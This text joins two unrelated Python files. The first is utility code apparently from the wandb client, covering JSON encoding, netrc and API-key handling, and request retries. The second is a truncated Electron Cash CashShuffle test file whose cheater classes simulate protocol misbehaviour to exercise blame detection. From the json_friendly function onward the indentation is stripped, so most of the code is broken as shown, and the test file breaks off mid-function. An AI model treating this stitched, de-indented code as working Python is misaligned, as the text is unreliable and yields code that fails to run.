def is_matplotlib_typename(typename):
    """True for any matplotlib type name."""
    return typename.startswith("matplotlib.")
def is_plotly_typename(typename):
    """True for any plotly type name."""
    return typename.startswith("plotly.")
def is_plotly_figure_typename(typename):
    """True for plotly Figure type names."""
    return typename.startswith("plotly.") and typename.endswith('.Figure')
def is_numpy_array(obj):
    """True if numpy is available and obj is an ndarray."""
    return np and isinstance(obj, np.ndarray)
def is_pandas_data_frame(obj):
    """True if obj is a pandas DataFrame (checked by type name)."""
    return is_pandas_data_frame_typename(get_full_typename(obj))
def ensure_matplotlib_figure(obj):
    """Extract the current figure from a matplotlib object or return the object if it's a figure.

    raises ValueError if the object can't be converted.
    """
    import matplotlib
    from matplotlib.figure import Figure
    # plotly and matplotlib broke in recent releases,
    # this patches matplotlib to add a removed method that plotly assumes exists
    from matplotlib.spines import Spine
    def is_frame_like(self):
        """Return True if directly on axes frame.

        This is useful for determining if a spine is the edge of an
        old style MPL plot. If so, this function will return True.
        """
        position = self._position or ('outward', 0.0)
        if isinstance(position, str):
            if position == 'center':
                position = ('axes', 0.5)
            elif position == 'zero':
                position = ('data', 0)
        if len(position) != 2:
            raise ValueError("position should be 2-tuple")
        position_type, amount = position
        if position_type == 'outward' and amount == 0:
            return True
        else:
            return False
    Spine.is_frame_like = is_frame_like
    # the pyplot module itself means "use the current figure"
    if obj == matplotlib.pyplot:
        obj = obj.gcf()
    elif not isinstance(obj, Figure):
        if hasattr(obj, "figure"):
            obj = obj.figure
            # Some matplotlib objects have a figure function
            if not isinstance(obj, Figure):
                raise ValueError(
                    "Only matplotlib.pyplot or matplotlib.pyplot.Figure objects are accepted.")
    if not obj.gca().has_data():
        raise ValueError(
            "You attempted to log an empty plot, pass a figure directly or ensure the global plot isn't closed.")
    return obj
def json_friendly(obj):
"""Convert an object into something that's more becoming of JSON"""
converted = True
typename = get_full_typename(obj)
if is_tf_eager_tensor_typename(typename):
obj = obj.numpy()
elif is_tf_tensor_typename(typename):
obj = obj.eval()
elif is_pytorch_tensor_typename(typename):
try:
if obj.requires_grad:
obj = obj.detach()
except AttributeError:
pass # before 0.4 is only present on variables
try:
obj = obj.data
except RuntimeError:
pass # happens for Tensors before 0.4
if obj.size():
obj = obj.numpy()
else:
return obj.item(), True
if is_numpy_array(obj):
if obj.size == 1:
obj = obj.flatten()[0]
elif obj.size <= 32:
obj = obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
elif isinstance(obj, bytes):
obj = obj.decode('utf-8')
elif isinstance(obj, (datetime, date)):
obj = obj.isoformat()
else:
converted = False
if getsizeof(obj) > VALUE_BYTES_LIMIT:
wandb.termwarn("Serializing object of type {} that is {} bytes".format(type(obj).__name__, getsizeof(obj)))
return obj, converted
def convert_plots(obj):
if is_matplotlib_typename(get_full_typename(obj)):
tools = get_module(
"plotly.tools", required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`")
obj = tools.mpl_to_plotly(obj)
if is_plotly_typename(get_full_typename(obj)):
return {"_type": "plotly", "plot": obj.to_plotly_json()}
else:
return obj
def maybe_compress_history(obj):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return wandb.Histogram(obj, num_bins=32).to_json(), True
else:
return obj, False
def maybe_compress_summary(obj, h5_typename):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return {
"_type": h5_typename, # may not be ndarray
"var": np.var(obj).item(),
"mean": np.mean(obj).item(),
"min": np.amin(obj).item(),
"max": np.amax(obj).item(),
"10%": np.percentile(obj, 10),
"25%": np.percentile(obj, 25),
"75%": np.percentile(obj, 75),
"90%": np.percentile(obj, 90),
"size": obj.size
}, True
else:
return obj, False
def launch_browser(attempt_launch_browser=True):
"""Decide if we should launch a browser"""
_DISPLAY_VARIABLES = ['DISPLAY', 'WAYLAND_DISPLAY', 'MIR_SOCKET']
_WEBBROWSER_NAMES_BLACKLIST = [
'www-browser', 'lynx', 'links', 'elinks', 'w3m']
import webbrowser
launch_browser = attempt_launch_browser
if launch_browser:
if ('linux' in sys.platform and
not any(os.getenv(var) for var in _DISPLAY_VARIABLES)):
launch_browser = False
try:
browser = webbrowser.get()
if (hasattr(browser, 'name')
and browser.name in _WEBBROWSER_NAMES_BLACKLIST):
launch_browser = False
except webbrowser.Error:
launch_browser = False
return launch_browser
def generate_id():
# ~3t run ids (36**8)
run_gen = shortuuid.ShortUUID(alphabet=list(
"0123456789abcdefghijklmnopqrstuvwxyz"))
return run_gen.random(8)
def parse_tfjob_config():
"""Attempts to parse TFJob config, returning False if it can't find it"""
if os.getenv("TF_CONFIG"):
try:
return json.loads(os.environ["TF_CONFIG"])
except ValueError:
return False
else:
return False
def parse_sm_config():
"""Attempts to parse SageMaker configuration returning False if it can't find it"""
sagemaker_config = "/opt/ml/input/config/hyperparameters.json"
resource_config = "/opt/ml/input/config/resourceconfig.json"
if os.path.exists(sagemaker_config) and os.path.exists(resource_config):
conf = {}
conf["sagemaker_training_job_name"] = os.getenv('TRAINING_JOB_NAME')
# Hyper-parameter searchs quote configs...
for k, v in six.iteritems(json.load(open(sagemaker_config))):
cast = v.strip('"')
if os.getenv("WANDB_API_KEY") is None and k == "wandb_api_key":
os.environ["WANDB_API_KEY"] = cast
else:
if re.match(r'^[-\d]+$', cast):
cast = int(cast)
elif re.match(r'^[-.\d]+$', cast):
cast = float(cast)
conf[k] = cast
return conf
else:
return False
class WandBJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
tmp_obj, converted = json_friendly(obj)
tmp_obj, compressed = maybe_compress_summary(
tmp_obj, get_h5_typename(obj))
if converted:
return tmp_obj
return json.JSONEncoder.default(self, tmp_obj)
class WandBHistoryJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
obj, converted = json_friendly(obj)
obj, compressed = maybe_compress_history(obj)
if converted:
return obj
return json.JSONEncoder.default(self, obj)
class JSONEncoderUncompressed(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
if is_numpy_array(obj):
return obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
return json.JSONEncoder.default(self, obj)
def json_dump_safer(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=WandBJSONEncoder, **kwargs)
def json_dumps_safer(obj, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dumps(obj, cls=WandBJSONEncoder, **kwargs)
# This is used for dumping raw json into files
def json_dump_uncompressed(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=JSONEncoderUncompressed, **kwargs)
def json_dumps_safer_history(obj, **kwargs):
"""Convert obj to json, with some extra encodable types, including histograms"""
return json.dumps(obj, cls=WandBHistoryJSONEncoder, **kwargs)
def make_json_if_not_number(v):
"""If v is not a basic type convert it to json."""
if isinstance(v, (float, int)):
return v
return json_dumps_safer(v)
def make_safe_for_json(obj):
"""Replace invalid json floats with strings. Also converts to lists and dicts."""
if isinstance(obj, Mapping):
return {k: make_safe_for_json(v) for k, v in obj.items()}
elif isinstance(obj, str):
# str's are Sequence, so we need to short-circuit
return obj
elif isinstance(obj, Sequence):
return [make_safe_for_json(v) for v in obj]
elif isinstance(obj, float):
# W&B backend and UI handle these strings
if obj != obj: # standard way to check for NaN
return 'NaN'
elif obj == float('+inf'):
return 'Infinity'
elif obj == float('-inf'):
return '-Infinity'
return obj
def mkdir_exists_ok(path):
try:
os.makedirs(path)
return True
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
return False
else:
raise
def no_retry_auth(e):
if hasattr(e, "exception"):
e = e.exception
if not isinstance(e, requests.HTTPError):
return True
# Don't retry bad request errors; raise immediately
if e.response.status_code == 400:
return False
# Retry all non-forbidden/unauthorized/not-found errors.
if e.response.status_code not in (401, 403, 404):
return True
# Crash w/message on forbidden/unauthorized errors.
if e.response.status_code == 401:
extra = ""
if wandb.run and str(wandb.run.api.api_key).startswith("local-"):
extra = " --host=http://localhost:8080"
if wandb.run.api.api_url == "https://api.wandb.ai":
raise CommError("Attempting to authenticate with the cloud using a local API key. Set WANDB_BASE_URL to your local instance.")
raise CommError("Invalid or missing api_key. Run wandb login" + extra)
elif wandb.run:
raise CommError("Permission denied to access {}".format(wandb.run.path))
else:
raise CommError("Permission denied, ask the project owner to grant you access")
def write_netrc(host, entity, key):
"""Add our host and key to .netrc"""
key_prefix, key_suffix = key.split('-', 1) if '-' in key else ('', key)
if len(key_suffix) != 40:
wandb.termlog('API-key must be exactly 40 characters long: {} ({} chars)'.format(key_suffix, len(key_suffix)))
return None
try:
normalized_host = host.split("/")[-1].split(":")[0]
wandb.termlog("Appending key for {} to your netrc file: {}".format(
normalized_host, os.path.expanduser('~/.netrc')))
machine_line = 'machine %s' % normalized_host
path = os.path.expanduser('~/.netrc')
orig_lines = None
try:
with open(path) as f:
orig_lines = f.read().strip().split('\n')
except (IOError, OSError) as e:
pass
with open(path, 'w') as f:
if orig_lines:
# delete this machine from the file if it's already there.
skip = 0
for line in orig_lines:
if machine_line in line:
skip = 2
elif skip:
skip -= 1
else:
f.write('%s\n' % line)
f.write(textwrap.dedent("""\
machine {host}
login {entity}
password {key}
""").format(host=normalized_host, entity=entity, key=key))
os.chmod(os.path.expanduser('~/.netrc'),
stat.S_IRUSR | stat.S_IWUSR)
return True
except IOError as e:
wandb.termerror("Unable to read ~/.netrc")
return None
def request_with_retry(func, *args, **kwargs):
"""Perform a requests http call, retrying with exponential backoff.
Args:
func: An http-requesting function to call, like requests.post
max_retries: Maximum retries before giving up. By default we retry 30 times in ~2 hours before dropping the chunk
*args: passed through to func
**kwargs: passed through to func
"""
max_retries = kwargs.pop('max_retries', 30)
sleep = 2
retry_count = 0
while True:
try:
response = func(*args, **kwargs)
response.raise_for_status()
return response
except (requests.exceptions.ConnectionError,
requests.exceptions.HTTPError,
requests.exceptions.Timeout) as e:
if isinstance(e, requests.exceptions.HTTPError):
# Non-retriable HTTP errors.
#
# We retry 500s just to be cautious, and because the back end
# returns them when there are infrastructure issues. If retrying
# some request winds up being problematic, we'll change the
# back end to indicate that it shouldn't be retried.
if e.response.status_code in {400, 403, 404, 409}:
return e
if retry_count == max_retries:
return e
retry_count += 1
delay = sleep + random.random() * 0.25 * sleep
if isinstance(e, requests.exceptions.HTTPError) and e.response.status_code == 429:
logger.info(
"Rate limit exceeded, retrying in %s seconds" % delay)
else:
logger.warning('requests_with_retry encountered retryable exception: %s. args: %s, kwargs: %s',
e, args, kwargs)
time.sleep(delay)
sleep *= 2
if sleep > MAX_SLEEP_SECONDS:
sleep = MAX_SLEEP_SECONDS
except requests.exceptions.RequestException as e:
logger.error(response.json()['error']) # XXX clean this up
logger.exception(
'requests_with_retry encountered unretryable exception: %s', e)
return e
def find_runner(program):
"""Return a command that will run program.
Args:
program: The string name of the program to try to run.
Returns:
commandline list of strings to run the program (eg. with subprocess.call()) or None
"""
if os.path.isfile(program) and not os.access(program, os.X_OK):
# program is a path to a non-executable file
try:
opened = open(program)
except IOError: # PermissionError doesn't exist in 2.7
return None
first_line = opened.readline().strip()
if first_line.startswith('#!'):
return shlex.split(first_line[2:])
if program.endswith('.py'):
return [sys.executable]
return None
def downsample(values, target_length):
"""Downsamples 1d values to target_length, including start and end.
Algorithm just rounds index down.
Values can be any sequence, including a generator.
"""
assert target_length > 1
values = list(values)
if len(values) < target_length:
return values
ratio = float(len(values) - 1) / (target_length - 1)
result = []
for i in range(target_length):
result.append(values[int(i * ratio)])
return result
def md5_file(path):
hash_md5 = hashlib.md5()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return base64.b64encode(hash_md5.digest()).decode('ascii')
def get_log_file_path():
"""Log file path used in error messages.
It would probably be better if this pointed to a log file in a
run directory.
"""
return wandb.GLOBAL_LOG_FNAME
def is_wandb_file(name):
return name.startswith('wandb') or name == wandb_config.FNAME or name == "requirements.txt" or name == OUTPUT_FNAME or name == DIFF_FNAME
def docker_image_regex(image):
"regex for valid docker image names"
if image:
return re.match(r"^(?:(?=[^:\/]{1,253})(?!-)[a-zA-Z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-zA-Z0-9-]{1,63}(?<!-))*(?::[0-9]{1,5})?/)?((?![._-])(?:[a-z0-9._-]*)(?<![._-])(?:/(?![._-])[a-z0-9._-]*(?<![._-]))*)(?::(?![.-])[a-zA-Z0-9_.-]{1,128})?$", image)
def image_from_docker_args(args):
"""This scans docker run args and attempts to find the most likely docker image argument.
If excludes any argments that start with a dash, and the argument after it if it isn't a boolean
switch. This can be improved, we currently fallback gracefully when this fails.
"""
bool_args = ["-t", "--tty", "--rm", "--privileged", "--oom-kill-disable", "--no-healthcheck", "-i",
"--interactive", "--init", "--help", "--detach", "-d", "--sig-proxy", "-it", "-itd"]
last_flag = -2
last_arg = ""
possible_images = []
if len(args) > 0 and args[0] == "run":
args.pop(0)
for i, arg in enumerate(args):
if arg.startswith("-"):
last_flag = i
last_arg = arg
elif "@sha256:" in arg:
# Because our regex doesn't match digests
possible_images.append(arg)
elif docker_image_regex(arg):
if last_flag == i - 2:
possible_images.append(arg)
elif "=" in last_arg:
possible_images.append(arg)
elif last_arg in bool_args and last_flag == i - 1:
possible_images.append(arg)
most_likely = None
for img in possible_images:
if ":" in img or "@" in img or "/" in img:
most_likely = img
break
if most_likely == None and len(possible_images) > 0:
most_likely = possible_images[0]
return most_likely
def load_yaml(file):
"""If pyyaml > 5.1 use full_load to avoid warning"""
if hasattr(yaml, "full_load"):
return yaml.full_load(file)
else:
return yaml.load(file)
def image_id_from_k8s():
"""Pings the k8s metadata service for the image id"""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
if os.path.exists(token_path):
k8s_server = "https://{}:{}/api/v1/namespaces/default/pods/{}".format(
os.getenv("KUBERNETES_SERVICE_HOST"), os.getenv(
"KUBERNETES_PORT_443_TCP_PORT"), os.getenv("HOSTNAME")
)
try:
res = requests.get(k8s_server, verify="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
timeout=3, headers={"Authorization": "Bearer {}".format(open(token_path).read())})
res.raise_for_status()
except requests.RequestException:
return None
try:
return res.json()["status"]["containerStatuses"][0]["imageID"].strip("docker-pullable://")
except (ValueError, KeyError, IndexError):
logger.exception("Error checking kubernetes for image id")
return None
def async_call(target, timeout=None):
"""Accepts a method and optional timeout.
Returns a new method that will call the original with any args, waiting for upto timeout seconds.
This new method blocks on the original and returns the result or None
if timeout was reached, along with the thread.
You can check thread.is_alive() to determine if a timeout was reached.
If an exception is thrown in the thread, we reraise it.
"""
q = queue.Queue()
def wrapped_target(q, *args, **kwargs):
try:
q.put(target(*args, **kwargs))
except Exception as e:
q.put(e)
def wrapper(*args, **kwargs):
thread = threading.Thread(target=wrapped_target, args=(q,)+args, kwargs=kwargs)
thread.daemon = True
thread.start()
try:
result = q.get(True, timeout)
if isinstance(result, Exception):
six.reraise(type(result), result, sys.exc_info()[2])
return result, thread
except queue.Empty:
return None, thread
return wrapper
def read_many_from_queue(q, max_items, queue_timeout):
try:
item = q.get(True, queue_timeout)
except queue.Empty:
return []
items = [item]
for i in range(max_items):
try:
item = q.get_nowait()
except queue.Empty:
return items
items.append(item)
return items
def stopwatch_now():
"""Get a timevalue for interval comparisons
When possible it is a monotonic clock to prevent backwards time issues.
"""
if six.PY2:
now = time.time()
else:
now = time.monotonic()
return now
def class_colors(class_count):
# make class 0 black, and the rest equally spaced fully saturated hues
return [[0, 0, 0]] + [colorsys.hsv_to_rgb(i / (class_count - 1.), 1.0, 1.0) for i in range(class_count-1)]
def guess_data_type(shape, risky=False):
"""Infer the type of data based on the shape of the tensors
Args:
risky(bool): some guesses are more likely to be wrong.
"""
# (samples,) or (samples,logits)
if len(shape) in (1, 2):
return 'label'
# Assume image mask like fashion mnist: (no color channel)
# This is risky because RNNs often have 3 dim tensors: batch, time, channels
if risky and len(shape) == 3:
return 'image'
if len(shape) == 4:
if shape[-1] in (1, 3, 4):
# (samples, height, width, Y \ RGB \ RGBA)
return 'image'
else:
# (samples, height, width, logits)
return 'segmentation_mask'
return None
def download_file_from_url(dest_path, source_url, api_key=None):
response = requests.get(source_url, auth=("api", api_key), stream=True, timeout=5)
response.raise_for_status()
if "/" in dest_path:
dir = "/".join(dest_path.split("/")[0:-1])
mkdir_exists_ok(dir)
with open(dest_path, "wb") as file:
for data in response.iter_content(chunk_size=1024):
file.write(data)
def set_api_key(api, key, anonymous=False):
if not key:
return
# Normal API keys are 40-character hex strings. Onprem API keys have a
# variable-length prefix, a dash, then the 40-char string.
prefix, suffix = key.split('-') if '-' in key else ('', key)
if len(suffix) == 40:
os.environ[env.API_KEY] = key
api.set_setting('anonymous', str(anonymous).lower(), globally=True, persist=True)
write_netrc(api.api_url, "user", key)
api.reauth()
return
raise ValueError("API key must be 40 characters long, yours was %s" % len(key))
def isatty(ob):
return hasattr(ob, "isatty") and ob.isatty()
LOGIN_CHOICE_ANON = 'Private W&B dashboard, no account required'
LOGIN_CHOICE_NEW = 'Create a W&B account'
LOGIN_CHOICE_EXISTS = 'Use an existing W&B account'
LOGIN_CHOICE_DRYRUN = "Don't visualize my results"
LOGIN_CHOICES = [
LOGIN_CHOICE_ANON,
LOGIN_CHOICE_NEW,
LOGIN_CHOICE_EXISTS,
LOGIN_CHOICE_DRYRUN
]
def prompt_api_key(api, input_callback=None, browser_callback=None, no_offline=False, local=False):
input_callback = input_callback or getpass.getpass
choices = [choice for choice in LOGIN_CHOICES]
if os.environ.get(env.ANONYMOUS, "never") == "never":
# Omit LOGIN_CHOICE_ANON as a choice if the env var is set to never
choices.remove(LOGIN_CHOICE_ANON)
if os.environ.get(env.JUPYTER, "false") == "true" or no_offline:
choices.remove(LOGIN_CHOICE_DRYRUN)
if os.environ.get(env.ANONYMOUS) == "must":
result = LOGIN_CHOICE_ANON
# If we're not in an interactive environment, default to dry-run.
elif not isatty(sys.stdout) or not isatty(sys.stdin):
result = LOGIN_CHOICE_DRYRUN
elif local:
result = LOGIN_CHOICE_EXISTS
else:
for i, choice in enumerate(choices):
wandb.termlog("(%i) %s" % (i + 1, choice))
def prompt_choice():
try:
return int(six.moves.input("%s: Enter your choice: " % wandb.core.LOG_STRING)) - 1
except ValueError:
return -1
idx = -1
while idx < 0 or idx > len(choices) - 1:
idx = prompt_choice()
if idx < 0 or idx > len(choices) - 1:
wandb.termwarn("Invalid choice")
result = choices[idx]
wandb.termlog("You chose '%s'" % result)
if result == LOGIN_CHOICE_ANON:
key = api.create_anonymous_api_key()
set_api_key(api, key, anonymous=True)
return key
elif result == LOGIN_CHOICE_NEW:
key = browser_callback(signup=True) if browser_callback else None
if not key:
wandb.termlog('Create an account here: {}/authorize?signup=true'.format(api.app_url))
key = input_callback('%s: Paste an API key from your profile and hit enter' % wandb.core.LOG_STRING).strip()
set_api_key(api, key)
return key
elif result == LOGIN_CHOICE_EXISTS:
key = browser_callback() if browser_callback else None
if not key:
wandb.termlog('You can find your API key in your browser here: {}/authorize'.format(api.app_url))
key = input_callback('%s: Paste an API key from your profile and hit enter' % wandb.core.LOG_STRING).strip()
set_api_key(api, key)
return key
else:
# Jupyter environments don't have a tty, but we can still try logging in using the browser callback if one
# is supplied.
key, anonymous = browser_callback() if os.environ.get(env.JUPYTER, "false") == "true" and browser_callback else (None, False)
set_api_key(api, key, anonymous=anonymous)
return key
def sizeof_fmt(num, suffix='B'):
"""Pretty print file size
https://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size
"""
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
def auto_project_name(program, api):
# if we're in git, set project name to git repo name + relative path within repo
root_dir = api.git.root_dir
if root_dir is None:
return None
repo_name = os.path.basename(root_dir)
if program is None:
return repo_name
if not os.path.isabs(program):
program = os.path.join(os.curdir, program)
prog_dir = os.path.dirname(os.path.abspath(program))
if not prog_dir.startswith(root_dir):
return repo_name
project = repo_name
sub_path = os.path.relpath(prog_dir, root_dir)
if sub_path != '.':
project += '-' + sub_path
return project.replace(os.sep, '_')
def parse_sweep_id(parts_dict):
"""In place parse sweep path from parts dict.
Args:
parts_dict (dict): dict(entity=,project=,name=). Modifies dict inplace.
Returns:
None or str if there is an error
"""
entity = None
project = None
sweep_id = parts_dict.get("name")
if not isinstance(sweep_id, six.string_types):
return 'Expected string sweep_id'
sweep_split = sweep_id.split('/')
if len(sweep_split) == 1:
pass
elif len(sweep_split) == 2:
split_project, sweep_id = sweep_split
project = split_project or project
elif len(sweep_split) == 3:
split_entity, split_project, sweep_id = sweep_split
project = split_project or project
entity = split_entity or entity
else:
return 'Expected sweep_id in form of sweep, project/sweep, or entity/project/sweep'
parts_dict.update(dict(name=sweep_id, project=project, entity=entity))
def has_num(dictionary, key):
return (key in dictionary and isinstance(dictionary[key], numbers.Number))
def get_program():
try:
import __main__
program = __main__.__file__
except (ImportError, AttributeError):
program = None
return program
def to_forward_slash_path(path):
if platform.system() == "Windows":
path = path.replace("\\", "/")
return path
def bytes_to_hex(bytestr):
# Works in python2 / python3
return codecs.getencoder('hex')(bytestr)[0].decode('ascii')
|
test.py
|
import unittest
import configparser
import subprocess
import os, sys
import random
import ecdsa
import threading
import time
import imp
sys.path.append(os.path.realpath(os.path.dirname(__file__)+"/../../../"))
imp.load_module('electroncash', *imp.find_module('lib'))
imp.load_module('electroncash_gui', *imp.find_module('gui/qt'))
imp.load_module('electroncash_plugins', *imp.find_module('plugins'))
from electroncash.address import Address
from electroncash.util import InvalidPassword
from electroncash_plugins.shuffle.client import ProtocolThread
from electroncash_plugins.shuffle.comms import (ChannelWithPrint, Channel)
from electroncash_plugins.shuffle.coin import Coin
from electroncash_plugins.shuffle.crypto import Crypto
# from electroncash_plugins.shuffle.phase import Phase
from electroncash_plugins.shuffle.round import Round
from electroncash.bitcoin import (regenerate_key, deserialize_privkey, EC_KEY, generator_secp256k1,
number_to_string ,public_key_to_p2pkh, point_to_ser, Hash)
class testNetwork(object):
"simple class for emulating the network. You can make your own utxo pool for test"
def __init__(self):
self.coins = {}
self.should_be_connected = True
def add_coin(self, address, value, height = 0, tx_pos = 0, tx_hash = ''):
if not self.coins.get(address):
self.coins[address] = []
self.coins[address].append({ "height" : height, "value": value , "tx_pos": tx_pos , "tx_hash" :tx_hash})
def synchronous_get(self, command):
bc_command, addresses = command
if bc_command == 'blockchain.scripthash.listunspent':
if len(addresses) > 0:
result = [self.coins[addr] for addr in self.coins if addr.to_scripthash_hex()==addresses[0]][0]
return result
else:
return []
def broadcast_transaction(self, tx):
return True, "done"
def is_connected(self):
return self.should_be_connected
class testThread(ProtocolThread):
def __init__(self, host, port, network, coin_name ,amount, fee, sk, sks, inputs, pubk, addr_new, change, logger = None, ssl = False):
# host, port, network, amount, fee, sk, sks, inputs, pubk, addr_new, change, logger=None, ssl=False
super(testThread, self).__init__(host, port, network, coin_name, amount, fee, sk, sks, inputs, pubk, addr_new, change, logger = logger, ssl = ssl)
@classmethod
def from_private_key(cls, priv_key, coin_hash, host, port, network, amount, fee, addr_new, change, ssl=False, logger = None):
address, secret, compressed = deserialize_privkey(priv_key)
sk = regenerate_key(secret)
pubk = sk.get_public_key(compressed)
sks = {pubk:sk}
inputs = {pubkey:[coin_hash]}
return cls(host, port, network, coin_hash ,amount, fee, sk, sks, inputs, pubk, addr_new, change, ssl=ssl, logger = logger)
# @classmethod
# def from_sk(cls, sk, sks, pubk, inputs, host, port, network, amount, fee, addr_new, change, compressed = True, logger = None):
# # pubk = sk.get_public_key(compressed)
# # sks = {pubk:sk}
# # inputs = {pubk:[coin_hash]}
# return cls(host, port, network, amount, fee,
# sk, sks, inputs, pubk, addr_new, change, logger=logger)
class random_sk(EC_KEY):
def __init__(self):
G = generator_secp256k1
_r = G.order()
pvk = ecdsa.util.randrange( _r )
eck = EC_KEY.__init__(self, number_to_string(pvk,_r))
def make_fake_public_key(compressed=True, secret_key = None):
sk = secret_key
if not secret_key:
sk = random_sk()
return sk.GetPubKey(compressed).hex()
def make_fake_address(compressed=True):
return public_key_to_p2pkh(make_fake_public_key(compressed=compressed))
def fake_hash(address, value):
return Hash("{}{}".format(address, value)).hex()
class Crypto_cheater(Crypto):
"""
This class is faking the Crypto. It needs for cheating on encryption decryption phase
"""
def generate_fake_key_pair(self):
self.fake_private_key = ecdsa.util.randrange( self._r )
self.fake_eck = EC_KEY(number_to_string(self.fake_private_key, self._r))
self.fake_public_key = point_to_ser(self.fake_private_key*self.G,True)
def export_fake_public_key(self):
return bytes.hex(self.fake_public_key)
def decrypt(self, message):
try:
return self.eck.decrypt_message(message)
except InvalidPassword:
return self.fake_eck.decrypt_message(message)
# return self.eck.decrypt_message(message)
class Round_wrong_broadcast(Round):
"""
This Class implements wrong behaviour of protocol
when cheater player send wrong encryption keys to one of
the player. All we do here is just redefine the broadcast key function
"""
def broadcast_new_key(self):
self.phase = 'Announcement'
self.crypto.generate_key_pair()
self.crypto.generate_fake_key_pair()
victim_key = random.choice([self.players[player] for player in self.players if not self.players[player] == self.vk])
print('PLAYER ' + str(self.me) + " IS A CHEATER")
print('CHEATER KEY IS ' + str(self.vk) )
victim_number = {self.players[player]:player for player in self.players}[victim_key]
print('VICTIM is ' + str(victim_number))
print('VICTIM KEY is ' + str(victim_key))
for player in self.players:
self.messages.clear_packets()
if self.players[player] is not victim_key:
self.messages.add_encryption_key(self.crypto.export_public_key(), self.change)
else:
self.messages.add_encryption_key(self.crypto.export_fake_public_key(), self.change)
self.send_message(destination = self.players[player])
# class for testing of sending of different vectors on pahse 3
class Round_wrong_output_vector(Round):
"""
This Class implements wrong behaviour of protocol
when cheater player send wrong output vector to one of
the player. All we do here is just redefine the process_shuffling function
"""
def process_shuffling(self):
phase = self.messages.phases[self.phase]
if self.me == self.last_player():
victim_key = random.choice([self.players[player] for player in self.players if not self.players[player] == self.vk])
victim_number = {self.players[player]:player for player in self.players}[victim_key]
self.logchan.send("The last player choose Player " + str(victim_number) + " as a VICTIM")
sender = self.players[self.previous_player(player = self.last_player())]
self.some_fake_address = '1574vWgV4DAhRBhzx7q2k1p1SeA2wCpiPF'
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add the last address
self.messages.add_str(self.addr_new)
# shuffle the packets
self.messages.shuffle_packets()
# form packet ...
self.phase = 'BroadcastOutput'
for player in self.players:
if not player == victim_number:
self.send_message(destination = self.players[player])
else:
# find it's own address and change em change some address in the vector
addresses = [packet.packet.message.str for packet in self.messages.packets.packet]
my_index = addresses.index(self.addr_new)
self.messages.packets.packet[my_index].packet.message.str = self.some_fake_address
self.send_message(destination = self.players[player])
self.messages.packets.packet[my_index].packet.message.str = self.addr_new
# self.send_message()
self.logchan.send("Player " + str(self.me) + " encrypt new address")
else:
sender = self.players[self.previous_player()]
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add encrypted new addres of players
self.messages.add_str(self.encrypt_new_address())
# shuffle the packets
self.messages.shuffle_packets()
self.send_message(destination = self.players[self.next_player()])
self.logchan.send("Player " + str(self.me) + " encrypt new address")
self.phase = 'BroadcastOutput'
def process_broadcast_output(self):
phase = self.messages.phases[self.phase]
sender = self.players[self.last_player()]
if self.inbox[phase].get(sender):
# extract addresses from packets
self.messages.packets.ParseFromString(self.inbox[phase][sender])
self.new_addresses = self.messages.get_new_addresses()
#check if player address is in
if self.addr_new in self.new_addresses or self.some_fake_address in self.new_addresses:
self.logchan.send("Player "+ str(self.me) + " receive addresses and found itsefs")
else:
self.messages.clear_packets()
self.messages.blame_missing_output(self.vk)
self.send_message()
self.logchan.send("Blame: player " + str(self.me) + " not found itsefs new address")
raise BlameException("Blame: player " + str(self.me) + " not found itsefs new address")
self.phase = 'EquivocationCheck'
self.logchan.send("Player "+ str(self.me) + " reaches phase 4: ")
# compute hash
computed_hash =self.crypto.hash(str(self.new_addresses) + str([self.encryption_keys[self.players[i]] for i in sorted(self.players) ]))
# create a new message
self.messages.clear_packets()
# add new hash
self.messages.add_hash(computed_hash)
self.send_message()
class Round_wrong_ciphertexts(Round):
"""
This Class implements wrong behaviour of protocol
when cheater player add the same ciphertext in the shuffling phase
"""
def process_shuffling(self):
phase = self.messages.phases[self.phase]
if self.me == self.last_player():
sender = self.players[self.previous_player(player = self.last_player())]
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add the last address
self.messages.add_str(self.addr_new)
# shuffle the packets
self.messages.shuffle_packets()
# form packet ...
self.phase = 'BroadcastOutput'
self.send_message()
self.logchan.send("Player " + str(self.me) + " encrypt new address")
else:
sender = self.players[self.previous_player()]
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add encrypted new addres of players
if not self.different_ciphertexts():
encrypted_address = self.encrypt_new_address()
packet_index = random.randint(0, len(self.messages.get_new_addresses())-1)
self.logchan.send("CHEATER IS " + str(self.me))
self.messages.packets.packet[packet_index].packet.message.str = encrypted_address
self.messages.add_str(encrypted_address)
# shuffle the packets
